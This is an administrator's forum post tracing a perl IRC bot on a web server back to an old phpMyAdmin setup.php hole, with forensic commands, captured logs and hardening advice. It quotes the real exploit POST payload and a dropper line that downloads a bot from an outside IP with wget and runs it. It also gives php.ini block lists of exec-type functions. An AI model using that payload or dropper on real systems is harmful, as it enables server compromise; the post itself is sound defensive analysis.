I have several servers under my administration that mainly host my own projects. In addition, I had to host a lot of other sites on them: clients', acquaintances', acquaintances of acquaintances', and so on. Since various problems came up during administration, some monitoring was set up (zabbix and self-written scripts).
And yesterday, on one of the servers, the script that checks active connections raised an alarm. An outgoing connection to an unknown host on port 443 had been hanging constantly for more than 9 hours by the time I got round to reading the mail on Monday morning.
A cursory scan found nothing besides this active connection: no suspicious processes on the system and no sharp increase of traffic on the interface. But that did not reassure me, so I had to dig further.
Based on the results of the analysis it turned out that most servers with a basic PHP configuration could have a similar security hole, so, to protect the other server owners out there on hosting from such cases, I decided to post here and describe how I found the source of the infection on the server.
The system was installed from Debian Lenny with the latest updates; it runs partly from squeeze: postfix + dovecot, apache2, lighttpd, mysql, php, perl. In general, almost a basic configuration.
My script that discovered this connection does the following every 30 minutes:
lsof -nP -i :80,443,25 +c 15
(a list of active outgoing connections on ports 80, 443, 25), minus Apache, the postfix mail server and a few of my own processes, and if anyone else is holding a connection besides these, it switches to panic mode.
From this script I received the following information:
perl 31621 www-data 4u IPv4 123556667 TCP [_ip]:59216->81.223.126.136:443 (ESTABLISHED)
I immediately connected over ssh and ran ps aux:
UID PID PPID C STIME TTY TIME CMD
www-data 31621 1 0 20:15 ? 00:00:00 /usr/sbin/apache2 -k start
That is, ps claimed it was Apache, not perl.
So I wanted to find the exact time this process appeared on the system and search the logs for that time, but the script runs at a 30-minute interval, during which a lot of log can be written. Pinning down the exact start time turned out to be quite a problem: ps aux gives the start time only to within a day (the last day, December 12), as does the creation date of the files in /proc/, and what a quick look at this information gave did not line up with the interval between the script's messages. But a bit of active googling turned up a command that finds the exact start time of a process to within a second:
# ps -eo pid,lstart,cmd
The second column shows the exact time the process was started: 12.12.2010 23:59:40.
Meanwhile I carefully went through the logs of each virtual host from that moment back to minus 5 minutes, and found nothing unusual :( I also built the process tree and confirmed that this process has no parent (its parent is pid 0). And there was not a single entry in the logs for the IP address the connection was hanging to (81.223.126.136).
Furthermore, googling about perl showed that it is very easy to change the command parameters to any other text; this is done through the variable $0. A running perl process can show up as mysqld, init or any other daemon.
So, in total: an active perl process with no parent, which had been hanging on 443 for over 9 hours and was running from somewhere, and PHP was nowhere to be seen on the hosting. So restarting Apache would leave this process running.
Next, I tried analysing the traffic with tcpdump:
000033 IP [my_ip].55026 > 81.223.126.136.443: . ack 1 win 46 <nop,nop,timestamp 575834701 2876573490>
000172 IP [my_ip].55026 > 81.223.126.136.443: P 1:13(12) ack 1 win 46 <nop,nop,timestamp 575834701 2876573490>
001043 IP 81.223.126.136.443 > [my_ip].54320: . ack 163 win 54 <nop,nop,timestamp 2876573490 575834655>
183151 IP 81.223.126.136.443 > [my_ip].55026: . ack 13 win 46 <nop,nop,timestamp 2876573536 575834701>
000022 IP [my_ip].55026 > 81.223.126.136.443: P 13:145(132) ack 1 win 46 <nop,nop,timestamp 575834747 2876573536>
000005 IP 81.223.126.136.443 > [my_ip].55026: P 1:77(76) ack 13 win 46 <nop,nop,timestamp 2876573536 575834701>
000006 IP [my_ip].55026 > 81.223.126.136.443: . ack 77 win 46 <nop,nop,timestamp 575834747 2876573536>
001213 IP 81.223.126.136.47092 > [my_ip].113: S 4059834353:4059834353(0) win 5840 <mss 1460,sackOK,timestamp 2876573536 0,nop,wscale 7>
000019 IP [my_ip].113 > 81.223.126.136.47092: S 2188075368:2188075368(0) ack 4059834354 win 5792 <mss 1460,sackOK,timestamp 575834748 2876573536,nop,wscale 7>
I also found in htop the option to run strace on the process:
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 559974})
read(4, "ERROR :Closing Link: Fasso'[sea.q"..., 4096) = 76
select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 599998})
read(4, ""..., 4096) = 0
close(4) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0x7fff99d8c7a0) = -1 EINVAL (Invalid argument)
lseek(4, 0, SEEK_CUR) = -1 ESPIPE (Illegal seek)
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0x7fff99d8c7a0) = -1 EINVAL (Invalid argument)
lseek(4, 0, SEEK_CUR) = -1 ESPIPE (Illegal seek)
fcntl(4, F_SETFD, FD_CLOEXEC) = 0
connect(4, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("81.223.126.136")}, 16) = 0
getsockname(4, {sa_family=AF_INET, sin_port=htons(54087), sin_addr=inet_addr("[my_ip]")}, [149023476701724688]) = 0
write(4, "NICK Fasso'\n"..., 12) = 12
getsockname(4, {sa_family=AF_INET, sin_port=htons(54087), sin_addr=inet_addr("[my_ip]")}, [149023476701724688]) = 0
write(4, "USER fake [my_ip] 81.223.1"..., 132) = 132
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGCHLD, NULL, {SIG_IGN}, 8) = 0
nanosleep({2, 0}, {2, 0}) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 599997})
read(4, "NOTICE AUTH :*** Looking up your "..., 4096) = 113
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 198392})
read(4, "NOTICE AUTH :*** Couldn't look up"..., 4096) = 66
write(4, "PONG :258562266\n"..., 16) = 16
select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 413936})
read(4, ":god.undernet.hk 432 * Fasso' :Er"..., 4096) = 50
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
From this data it was clear that the bot periodically exchanges information with the server (every 30 to 60 seconds), is actively working, but generates little traffic. I saw the host god.undernet.hk, but that did not help find the bot's source on the system.
Then, using my head a bit more, I ran lsof -p 31621 and got the following output:
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 31621 www-data cwd DIR 9,4 640 2 /tmp
perl 31621 www-data rtd DIR 9,1 4096 2 /
perl 31621 www-data txt REG 9,1 6848 245277 /usr/bin/perl
perl 31621 www-data mem REG 9,1 25536 310438 /usr/lib/perl/5.10.0/auto/Socket/Socket.so
perl 31621 www-data mem REG 9,1 19704 310433 /usr/lib/perl/5.10.0/auto/IO/IO.so
perl 31621 www-data mem REG 9,1 39112 1404408 /lib/libcrypt-2.7.so
perl 31621 www-data mem REG 9,1 1375536 262722 /lib/libc-2.7.so
perl 31621 www-data mem REG 9,1 130114 261372 /lib/libpthread-2.7.so
perl 31621 www-data mem REG 9,1 534736 1404410 /lib/libm-2.7.so
perl 31621 www-data mem REG 9,1 14616 1404409 /lib/libdl-2.7.so
perl 31621 www-data mem REG 9,1 1499352 246277 /usr/lib/libperl.so.5.10.0
perl 31621 www-data mem REG 9,1 119288 262716 /lib/ld-2.7.so
perl 31621 www-data 0u unix 0xffff880080459200 122918994 /tmp/php.socket-1
perl 31621 www-data 1w FIFO 0,8 123556620 pipe
perl 31621 www-data 2w REG 9,1 838 979223 /var/log/lighttpd/error.log
perl 31621 www-data 3u unix 0xffff880020d31500 123039634 /tmp/php.socket-1
perl 31621 www-data 4u IPv4 123556667 TCP [_ip]:59216->136-126-223-81.static.edis.at:https (ESTABLISHED)
This output immediately surprised me with the presence of the word lighttpd (I have two IPs on the server: Apache sits on one, lighttpd on the other), whereas in ps the process looked like Apache; and it was clearly launched from /tmp.
After racking my brains some more, I decided to dump the process's memory, but reading /proc/<pid>/mem did not help. What did help was the gcore command (from the gdb package): with it I dumped the process's memory, about 3.2 MB, and started going through it by hand. Looking through it, I could spot the following text fragments:
@fakeps
/usr/sbin/apache2 -k start
god.txt
HTTP_HOST=[my_ip]..!.......DOCUMENT_ROOT=/var/www/.A.......SCRIPT_FILENAME=/var/www/phpmyadmin3/scripts/setup.php..A.......SCRIPT_NAME=/phpmyadmin3/scripts/setup.php..............!.......PHP_FC
GI_CHILDREN=16....1.......PATH=/sbin:/bin:/usr/sbin:/usr/bin......!.......PWD=/tmp................1.......REMOTE_ADDR=62.193.226.196..............!.......SHLVL=1.................1.......PHP_FCGI_MAX_REQUESTS=10000.............1.......OLDPWD=/
var/www/phpmyadmin3.............!......._=/usr/bin/perl
Gotcha! Perl was launched from the PHP script /var/www/phpmyadmin3/scripts/setup.php.
I went to Google, typed "phpmyadmin setup.php exploit" and found a working exploit: www.securityfocus.com/bid/34236, discovered 2009-03-24. According to the phpmyadmin website, www.phpmyadmin.net/home_page/security/PMASA-2009-3.php, it is fixed only in versions 2.11.9.5 and 3.1.3.1.
This phpmyadmin had been set up by hand quite a long time ago; there was no version 3 in the repository then, so it was 3.0.0-rc2, i.e. an old one with the hole still open, and I completely forgot about it and left it lying dead until today.
Furthermore, since I now knew the address of the php script, I could find the requests to it in the lighttpd log:
62.193.226.196 [my_ip] - [12/Dec/2010:15:54:57 +0300] "GET /phpmyadmin3/scripts/setup.php HTTP/1.1" 200 14083 "http://[my_ip]/phpmyadmin3/scripts/setup.php" "Opera"
62.193.226.196 [my_ip] - [12/Dec/2010:15:54:59 +0300] "POST /phpmyadmin3/scripts/setup.php HTTP/1.1" 200 556203 "http://[my_ip]/phpmyadmin3/scripts/setup.php" "Opera"
The only thing I do not understand is the time difference: the request was at 15:54, and the process appeared at 23:59.
I still wanted to know which bot had got me, so instead of blocking access to the script I set a trap in it:
// record the time, environment and request parameters of every call to setup.php
$loginfo['date'] = date('c');
$loginfo['env']  = var_export($_ENV, true);
$loginfo['get']  = var_export($_GET, true);
$loginfo['post'] = var_export($_POST, true);
file_put_contents('log.txt', var_export($loginfo, true), FILE_APPEND);
The trap did not have to wait long: at 22:00 the next day there was another request to this script, so now I have the exploit code:
'post' => 'array ( \'action\' => \'lay_navigation\', \'eoltype\' => \'unix\', \'token\' => \'4b179cfc2f788d828bf9ff8d2f122459\', \'configuration\' => \'a:1:{i:0;O:10:\\\\"PMA_Config\\\\":1:{s:6:\\\\"source\\\\";s:44:\\\\" ftp://web1:l33t@85.25.132.71/html/godbot.txt\\\\";}}\', )'
I downloaded this file with wget and saw the following:
<?php system("cd /tmp;killall -9 perl;wget -O god.txt 67.19.118.242/god.txt;perl god.txt;rm -f god.txt*");die;
From this link I have also already obtained the bot code itself (34 KB); anyone interested can download it and have a look.
All in all, I managed to find the cause of this bot's intrusion and obtain the bot's own code. All that remains is to fix the hole ;)
I hope my description of the analysis helps other admins search for and analyse all kinds of evil on their servers.
How to protect yourself from such cases
The first thing that comes to mind is that you need to update to the latest versions in time. Yes, in this particular case it is my own fault for not keeping up with the phpmyadmin version, but you cannot make every hosting client constantly update phpmyadmin; users with access to their home folders have already been the cause of similar problems. Fighting for the cleanliness and security of every site's code is pointless; global protective measures are needed.
Since every server with a basic php configuration is potentially exposed to a similar threat, and it is almost impossible to notice that such a bot has settled on the server, I recommend that administrators protect their servers from similar problems in advance and set up monitoring for unusual activity.
I took the following security measures:
1. Set up regular monitoring of active connections. This lets you notice unusual activity immediately, whether a PHP script is sending spam or a bot is connecting to its server. In this script I additionally added an lsof command and a memory dump of the process: by the time you get to the server yourself, the malicious script may already have finished and unloaded itself.
2. Forbid in php the execution of functions like exec, system and so on. Most clients do not use them, since they are hardly ever needed. Logging the use of these functions would be the ideal option, but I could not find a way to do it (by the way, can anyone tell me how?). The full line in php.ini is as follows:
disable_functions = "ini_alter, curl_exec, exec, system, passthru, shell_exec, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, leak, listen, chgrp, apache_note, apache_setenv, closelog, debugger_off, debugger_on, define_syslog_variables, openlog, syslog, ftp_exec, dl"
I would like to hear from Habr users in the comments whether the protection methods were chosen correctly, and how you protect against such cases on your servers.
Also, the following questions remain open for me:
- How, without a memory dump and without going through it by hand, can one find the actual command that started a process, if the process name and its path have already been overwritten by the process itself?
- In Linux, how can one isolate and view, with tcpdump or a similar utility, all traffic of a specific process whose pid is known?
- Are there ready-made solutions for monitoring non-standard server activity on connections?
- Is there a way in PHP to log the execution of functions like exec?
UPD.: By the way, this hole may not be closed in phpmyadmin from the repository; this needs to be checked carefully. The hole was patched only in versions 2.11.9.5 and 3.1.3.1. But Debian Lenny, for example, has 2.11.8.1-5+lenny6, and there the hole is closed by a separate patch - http://www.debian.org/security/2009/dsa-1824
Details of the hole:
www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
UPD2: Is there some way to configure, through a firewall (iptables in the case of Linux), a restriction on network access for a specific process? For example, forbid all perl processes from connecting to the outside. Android OS (which also runs on the Linux kernel) has the DroidWall program, which allows or denies network access for specific applications, but I could not figure out whether this can be done on a basic Linux distribution (Debian etc.).
UPD3: Based on the comments, and by hand, I extended the list of functions and removed a few unnecessary ones:
disable_functions = "apache_setenv, chown, chgrp, closelog, define_syslog_variables, dl, exec, ftp_exec, openlog, passthru, pcntl_exec, popen, posix_getegid, posix_geteuid, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_open, proc_terminate, shell_exec, syslog, system"
UPD4: Added at readers' request: the script for checking active connections (! quickly knocked together for my personal needs !):
<?php
// shell_exec() returns the whole output; system() returns only its last line, so the loop
// below would otherwise see a single row.
$out = shell_exec("lsof -nP -i :80,443,25 +c 15 | grep -v -E '^(COMMAND|apache2|zabbix|smtpd?|master|scache|host|lighttpd)' | grep -v 'wget.*>[my_ip]:80'");
if (!empty($out)) {
    $arr = explode("\n", trim($out));
    foreach ($arr as $str) {
        echo $str . "\n";
        $spl = preg_split("/\s+/", $str);
        // for every unexpected connection, show the process and its open files
        echo `ps -f -p {$spl[1]}` . "\n\n";
        echo `lsof -p {$spl[1]}` . "\n\n";
    }
}
And register it in cron every 30 minutes. If something extra shows up when it runs, add it to the grep list so it does not get in the way. As a result, if anything sending spam or trying to download something is left, cron immediately notifies you by mail.
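As an added example (my own code, not the script from the post), the same check in Python: it parses rows of `lsof -nP -i` output, ignores listeners and inbound connections, and reports outbound connections on 80/443/25 held by anything outside an allowlist. The allowlist, the sample rows and the 10.0.0.5 server address are constructed; `own_hosts` mirrors the post's `grep -v 'wget.*>[my_ip]:80'` exclusion.

```python
import subprocess
from typing import List, NamedTuple, Optional

WATCHED_PORTS = {80, 443, 25}
# Constructed allowlist modelled on the post's grep -v list: commands expected to hold connections on
# those ports (web servers, postfix parts, zabbix agent, resolver). Anything else talking out is reported.
ALLOWED_COMMANDS = {"apache2", "lighttpd", "zabbix_agentd", "smtp", "smtpd", "master", "scache", "host"}

class Conn(NamedTuple):
    cmd: str
    pid: int
    user: str
    remote_host: str
    remote_port: int

def parse_lsof_line(line: str) -> Optional[Conn]:
    """Parse one row of `lsof -nP -i` output; None for the header, UDP rows and LISTEN sockets."""
    f = line.split()
    if len(f) < 8 or f[0] == "COMMAND" or "TCP" not in f:
        return None
    name = f[f.index("TCP") + 1]              # e.g. 10.0.0.5:59216->81.223.126.136:443
    if "->" not in name:
        return None                           # "*:80" rows are listeners, not connections
    host, port = name.split("->", 1)[1].rsplit(":", 1)   # rsplit copes with [ipv6]:port too
    return Conn(f[0], int(f[1]), f[2], host, int(port))

def find_suspicious(lines, allowed=ALLOWED_COMMANDS, own_hosts=()) -> List[Conn]:
    """Connections to a watched port on a remote host, held by a command outside the allowlist.
    own_hosts are the server's own addresses, so a site's wget to localhost is not reported."""
    hits = []
    for line in lines:
        c = parse_lsof_line(line)
        if c and c.remote_port in WATCHED_PORTS and c.cmd not in allowed and c.remote_host not in own_hosts:
            hits.append(c)
    return hits

# Constructed sample in lsof's layout; the perl row mirrors the one in the post.
SAMPLE = """\
COMMAND   PID     USER  FD  TYPE    DEVICE SIZE/OFF NODE NAME
apache2  1203 www-data  5u  IPv4    112233      0t0  TCP *:80 (LISTEN)
apache2  1203 www-data  9u  IPv4    112290      0t0  TCP 10.0.0.5:80->198.51.100.7:51234 (ESTABLISHED)
smtp    28810  postfix  7u  IPv4    123400      0t0  TCP 10.0.0.5:44012->203.0.113.25:25 (ESTABLISHED)
wget     4410 www-data  3u  IPv4    123410      0t0  TCP 10.0.0.5:40100->10.0.0.5:80 (ESTABLISHED)
perl    31621 www-data  4u  IPv4 123556667      0t0  TCP 10.0.0.5:59216->81.223.126.136:443 (ESTABLISHED)
"""

def check_live_system(own_hosts=()) -> List[Conn]:
    """Run lsof exactly as the post's cron job does and return the unexpected connections."""
    out = subprocess.run(["lsof", "-nP", "-i", ":80,443,25", "+c", "15"],
                         capture_output=True, text=True, check=False).stdout
    return find_suspicious(out.splitlines(), own_hosts=own_hosts)
```

Calling `check_live_system()` from cron gives the same alert as the PHP version; each hit is then followed up with `ps -f -p` and `lsof -p` as the post does.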
UPD4: From user z123: how to find the actual program that started a process (if it has been renamed):
ps -p 123 -o comm
readlink /proc/123/exe (replace 123 with the process number)
But unfortunately this does not show the launch parameters and folder: for this bot it shows only perl and /usr/bin/perl, so without a memory dump I could not find a way to locate the folder of the infection source (i.e. to find the line /var/www/phpmyadmin3/scripts/setup.php).
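As an added example, not from the post or its commenters, a Python cross-check for the open question above: it compares the task name the kernel set at execve (/proc/<pid>/comm, the value `lsof +c 15` showed as perl) with the argv the process advertises (what `ps aux` showed as apache2) and with its working directory, and goes one step beyond the post by also flagging an executable deleted after start. The finding codes, SCRATCH_DIRS and the function names are my own.

```python
import os
from pathlib import PurePosixPath
from typing import List

SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")   # constructed list of places daemons rarely run from

def inconsistencies(comm: str, exe: str, cmdline: List[str], cwd: str) -> List[str]:
    """Cross-check what a process advertises about itself against what the kernel knows.
    comm    - task name (/proc/<pid>/comm), at most 15 characters, set by the kernel at execve
    exe     - target of /proc/<pid>/exe, with " (deleted)" appended if the file is gone
    cmdline - argv; user code can rewrite it freely (perl's $0, for example)
    cwd     - target of /proc/<pid>/cwd
    Returns finding codes; an empty list means nothing looks forged. These are leads, not proof:
    login shells ("-bash") and symlinked interpreters also produce argv0/comm differences."""
    findings = []
    argv0 = PurePosixPath(cmdline[0]).name if cmdline else ""
    if exe.endswith(" (deleted)"):
        findings.append("exe_deleted")                 # binary removed after start
    if argv0[:15] != comm:
        findings.append("argv0_differs_from_comm")     # ps says one thing, the kernel another
    if any(cwd == d or cwd.startswith(d + "/") for d in SCRATCH_DIRS):
        findings.append("cwd_in_scratch_dir")          # e.g. the post's bot running out of /tmp
    return findings

def inspect_pid(pid: int) -> List[str]:
    """Collect the four facts from /proc and run the cross-check (Linux only)."""
    base = f"/proc/{pid}"
    try:
        with open(f"{base}/comm") as fh:
            comm = fh.read().strip()
    except FileNotFoundError:        # pre-2.6.33 kernels: the name sits in parentheses in stat
        with open(f"{base}/stat") as fh:
            comm = fh.read().split("(", 1)[1].rsplit(")", 1)[0]
    with open(f"{base}/cmdline", "rb") as fh:
        cmdline = [a.decode(errors="replace") for a in fh.read().split(b"\0") if a]
    return inconsistencies(comm, os.readlink(f"{base}/exe"), cmdline, os.readlink(f"{base}/cwd"))
```

This answers "is the process lying about itself", not "which script launched it": for an interpreted bot /proc still points at /usr/bin/perl, and only the memory dump gives the script path, as the post found.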